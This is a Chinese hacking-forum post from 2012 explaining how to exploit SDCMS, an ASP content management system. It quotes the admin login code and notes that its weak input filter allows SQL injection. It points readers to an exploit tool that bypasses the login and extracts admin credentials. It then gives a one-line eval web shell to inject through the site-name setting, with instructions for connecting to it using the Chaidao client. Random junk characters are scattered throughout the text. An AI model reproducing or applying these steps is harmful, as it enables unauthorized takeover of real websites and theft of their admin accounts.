作者:T00LS 鬼哥, m5 Y# Z( x" Z* O- k
漏洞文件:后台目录/index.asp
1 h0 J. l0 {1 U- e
" d( }6 \+ W6 i- j- H( n. USub Check
) ~/ k" b! C; ?# [7 H* R5 b Dim username,password,code,getcode,Rs
6 A" W) N7 y" _( i) Y |' d IF Check_post Then Echo "1禁止从外部提交数据!":Exit Sub8 \1 h" h8 L: H# J1 f( b- W
username=FilterText(Trim(Request.Form("username")),1)! h3 _- k" Q; N" R, v
password=FilterText(Trim(Request.Form("password")),1)
, z6 p& @4 [5 V' F8 Q7 g U+ w code=Trim(Request.Form("yzm"))
* J( v( V4 Z1 U: i3 h" } P5 z. H+ C getcode=Session("SDCMSCode")5 y% V& M/ M; u$ P. R) v
IF errnum>=loginnum Then Echo "系统已禁止您今日再登录":died
" L$ J$ s$ B% ^& f2 J ? IF code="" Then Alert "验证码不能为空!","javascript:history.go(-1)" ied
. m8 M& W6 i# r IF code<>"" And Not Isnumeric(code) Then Alert "验证码必须为数字!","javascript:history.go(-1)"ied
/ E7 ~3 g* V K$ m9 A$ X4 ]. [ IF code<>getcode Then Alert "验证码错误!","javascript:history.go(-1)"ied
& u: j) j d* N+ H) E IF username="" or password="" Then+ J$ f% u. }5 ]! A" @ D$ J
Echo "用户名或密码不能为空"ied: U. v5 H+ s4 j' U" H3 Q' I
Else
* b; L, M/ N& X3 ~) Y8 [ Set Rs=Conn.Execute("Select Id,Sdcms_Name,Sdcms_Pwd,isadmin,alllever,infolever From Sd_Admin Where Sdcms_name='"&username&"' And Sdcms_Pwd='"&md5(password)&"'")
& O8 {. K1 s6 X+ _- ^- C& T IF Rs.Eof Then. u+ D2 c7 w4 X8 y2 V8 I0 q7 w
AddLog username,GetIp,"登录失败",1
- s4 [7 n( r. o5 x' k Echo "用户名或密码错误,今日还有 "&loginnum-errnum&" 次机会"$ \: R0 b3 ~7 p9 k
Else
; ]* E$ L3 i9 e& A% b Add_Cookies "sdcms_id",Rs(0)
8 `9 u1 ^) K& S0 K; K* v: G" T. M1 d Add_Cookies "sdcms_name",username# W I, D7 x0 C8 Y w" U
Add_Cookies "sdcms_pwd",Rs(2); o. e# a9 j4 S" e5 v! |" |9 R8 O/ v
Add_Cookies "sdcms_admin",Rs(3), p- U6 r& F* [+ x- D
Add_Cookies "sdcms_alllever",Rs(4)# B" V- {) T! e! y# s
Add_Cookies "sdcms_infolever",Rs(5)
( k, [ R0 [% F7 o Conn.Execute("Update Sd_Admin Set logintimes=logintimes+1,LastIp='"&GetIp&"' Where id="&Rs(0)&"")
! L7 T7 V9 ]9 X1 N- n AddLog username,GetIp,"登录成功",1: I( b7 { P" g1 T4 W
'自动删除30天前的Log记录/ }: j* _" G& s x, A
IF Sdcms_DataType Then7 I2 s; v6 V; S7 S3 s7 U
Conn.Execute("Delete From Sd_Log Where DateDiff('d',adddate,Now())>30")
# j; U* p4 C0 C Else
6 B9 E4 D% L. j$ B; [ Conn.Execute("Delete From Sd_Log Where DateDiff(d,adddate,GetDate())>30")/ E! n2 i9 a, D/ n5 c, y6 D. l) q
End IF
7 e1 q' B% s7 w Go("sdcms_index.asp"); K% s+ ~0 G x+ m" t9 C& P
End IF1 A% M$ u: ~1 K ^& B5 p, a" Q: A
Rs.Close
0 i1 I% K- ?4 e+ t7 _) t8 B Set Rs=Nothing
: Z b# d* P; I8 P4 o End IF1 S% l3 E$ E# g
End Sub0 Q8 E/ z" @- O0 q" x
' L- \& Y7 p+ M0 C A
’我们可以看到username是通过FilterText来过滤的。我们看看FilterText的代码
( \ ~2 |4 W2 B1 e6 W8 G% p# v S6 _/ }. U
Function FilterText(ByVal t0,ByVal t1)% D8 T( p: O$ G g. T) Z. {8 u6 q* O
IF Len(t0)=0 Or IsNull(t0) Or IsArray(t0) Then FilterText="":Exit Function" k* l& }9 T4 G; H+ K/ Z
t0=Trim(t0)
& r" A# J" y3 \9 M) K) e) L& ~ Select Case t1: A$ n3 z* l( ] f( T# b! b
Case "1"
" Q! I+ B5 ?: Z; C/ o8 a t0=Replace(t0,Chr(32),"")$ N$ ^7 ?; f' p. C& z5 b
t0=Replace(t0,Chr(13),"")
7 K4 g( p9 Y% l$ w# r( Q& S t0=Replace(t0,Chr(10)&Chr(10),"")5 i6 E5 |9 O3 o& r5 i
t0=Replace(t0,Chr(10),""), W3 d: r/ G) Y4 H! x7 X
Case "2"
3 r( b( l7 Q3 q: e$ {" C5 e) {% } t0=Replace(t0,Chr(8),"")'回格* \8 a; ~1 R2 z) N
t0=Replace(t0,Chr(9),"")'tab(水平制表符)9 ^& E' p' ?4 v! s9 u/ p. l
t0=Replace(t0,Chr(10),"")'换行" O+ f) ^0 ?/ t1 H3 k
t0=Replace(t0,Chr(11),"")'tab(垂直制表符)3 b0 z* r; B, I9 j. f6 n! |
t0=Replace(t0,Chr(12),"")'换页+ V! m2 a. P0 S4 f
t0=Replace(t0,Chr(13),"")'回车 chr(13)&chr(10) 回车和换行的组合
) t/ Q6 X' o, Z: x) o" n9 z5 r t0=Replace(t0,Chr(22),"")
6 p& B# {3 |0 ~2 I t0=Replace(t0,Chr(32),"")'空格 SPACE
* B) ?+ H' q @# | t0=Replace(t0,Chr(33),"")'!
( X+ y9 w# u7 A* Q t0=Replace(t0,Chr(34),"")'"
( x# x! _2 l$ m7 }& a t0=Replace(t0,Chr(35),"")'#) V1 S: B+ q6 w; J
t0=Replace(t0,Chr(36),"")'$$ V, s5 n9 X5 U7 d/ y+ r M1 E
t0=Replace(t0,Chr(37),"")'%/ O: S4 J! F3 K" U6 l/ q
t0=Replace(t0,Chr(38),"")'&
" \, K9 a' x6 E' J# g t0=Replace(t0,Chr(39),"")''
* |( k9 H* {6 p7 B6 M, i G" a6 Q t0=Replace(t0,Chr(40),"")'(
) }4 E# b b+ ] t0=Replace(t0,Chr(41),"")')2 n# i/ u& t% m8 }- I
t0=Replace(t0,Chr(42),"")'*
/ |! [# p. H7 n7 c9 n3 T/ {4 y, b t0=Replace(t0,Chr(43),"")'+
5 g) g3 Y" z6 ~ t0=Replace(t0,Chr(44),"")',
, V' R( L) G. K* j1 |4 k; a8 \ t0=Replace(t0,Chr(45),"")'-
4 {5 p( Z) C$ k" N+ B- E! P6 W t0=Replace(t0,Chr(46),"")'.0 j. s3 b! ~4 H
t0=Replace(t0,Chr(47),"")'/
: W3 b+ x: f; x9 V/ [ t0=Replace(t0,Chr(58),"")':
2 y2 ~7 |6 R2 A" e t0=Replace(t0,Chr(59),"")';
1 e# n. \) G1 w6 ?+ Z t0=Replace(t0,Chr(60),"")'< t0=Replace(t0,Chr(61),"")'= t0=Replace(t0,Chr(62),"")'>
) w# M1 o) L c/ }/ _ t0=Replace(t0,Chr(63),"")'?
7 w- C$ J$ _# [0 ~ t0=Replace(t0,Chr(64),"")'@' v5 f* g& f. M
t0=Replace(t0,Chr(91),"")'\' ?8 F$ N5 k4 v) M
t0=Replace(t0,Chr(92),"")'\0 ?) `# c; t9 Q' [. @4 A
t0=Replace(t0,Chr(93),"")']
* h$ u% T3 L- X t0=Replace(t0,Chr(94),"")'^
. P+ i! u) {7 q) [' `1 q t0=Replace(t0,Chr(95),"")'_
- x8 v8 S/ H# l6 t/ U# X9 E t0=Replace(t0,Chr(96),"")'`
6 w" D, H9 g" G, X g3 X4 F t0=Replace(t0,Chr(123),"")'{
! R. y" n& ~; ?# k4 R- a t0=Replace(t0,Chr(124),"")'|
, [$ S( i: S7 P8 z6 E, R) J* R' _ t0=Replace(t0,Chr(125),"")'}
0 [0 {, C$ k' m t0=Replace(t0,Chr(126),"")'~/ F5 _: X7 }4 Q. a7 s! l2 S9 D$ E
Case Else
* a% u, ^& G9 f2 y t0=Replace(t0, "&", "&") u, k# j* n5 ^. G3 t6 U8 {# d
t0=Replace(t0, "'", "'")
, S& @* \3 N. c# ~: E2 c$ n( u' j t0=Replace(t0, """", """)
8 y* A8 @ m% G4 N6 s0 n& N t0=Replace(t0, "<", "<") t0=Replace(t0, ">", ">")
1 W- Y: z/ j, U8 B9 _ End Select
1 g( L) E' @) l( u IF Instr(Lcase(t0),"expression")>0 Then2 K; n: u( c; I0 a; S
t0=Replace(t0,"expression","e­xpression", 1, -1, 0)2 V0 V4 r: k: _' u" ^
End If, x8 |: H' B' V9 D& W# ?& h. M
FilterText=t0+ H0 X2 \ {) h9 b& o1 ?
End Function1 v* H; i! i& C7 Z6 d0 I8 n# P
# q+ k/ Q8 f) }: g3 k
看到没。直接参数是1 只过滤! B2 u' I! h( u! X) T$ k
t0=Replace(t0,Chr(32)," ")( O8 U! |( \7 r9 I) o e5 c
t0=Replace(t0,Chr(13),"")
9 j x0 _" }9 R& `$ ^ t0=Replace(t0,Chr(10)&Chr(10),"
B3 t; _& w) n _# x")8 V) M" x# ]) v+ ]; V! C6 y) }
t0=Replace(t0,Chr(10),"! e! |/ f4 b$ Q" u8 R" ^3 h
"), j: v# Z7 q) `$ ~/ x
漏洞导致可以直接拿到后台帐号密码。SDCMS默认后台地址/admin/如果站长改了后台路径,那么请自行查找!5 e/ t" U$ e; w6 X
EXP利用工具下载 (此工具只能在XP上运行):sdcms-EXP: G0 S4 R- b5 p9 P0 e
" R8 v0 ^' w, Z0 V8 t2 Q
测试:) o* a8 x( q( z8 x) k
4 d, P6 j4 B4 q" i
* w+ U& p' J. h5 q8 ~现在输入工具上验证码,然后点OK
6 h2 q+ J5 j0 @1 u) ?5 z0 t! H
$ E& o. ?( z3 G8 j& D
) Z& N. @" j6 y- P, b5 w看到我们直接进入后台管理界面了,呵呵!
' Z! n: H! \: ?/ G4 `* @
0 Z7 l2 m$ d' Q7 a- p% b% J" B
. N0 Z+ D$ }) n
, m2 }; y8 d& B这样直接进入后台了。。。。
- O) W7 x0 Y' ~+ x
1 L& c' ^" c% ^' a7 F! _, ^$ i: { 6 r% I5 k3 A" \! F; {; F! f
5 `* ^: A; U2 c7 p7 s3 O# B/ p
SDCMS提权:
: S! j9 p+ F; J+ ]4 [& N- N
3 z- a9 F2 k/ a7 x/ j2 Y- d方法1:访问:/后台目录/sdcms_set.asp 在 网站名称:后面加个 “:eval(request(Chr(63)))’ 即可,直接写一句话进去。 写入到/inc/Const.asp 一句话连接密码是?; v6 S! ^0 G2 w7 _$ e2 y. g
+ a5 s3 U4 U. q- A5 i) T
; X1 r; [, N0 w+ p; e t) g- F! b; F( W
OK,现在用菜刀连接下!
a7 s0 V8 D" `* ?) W: w4 v9 r* p( ~! o9 r1 z+ e
) A# |7 M6 @% |$ e
* Z5 A' P9 A0 @
( q* ^* b8 x5 |
) w, q/ j5 S9 o
|
发表于 2012-11-9 20:57:02
收藏
支持
反对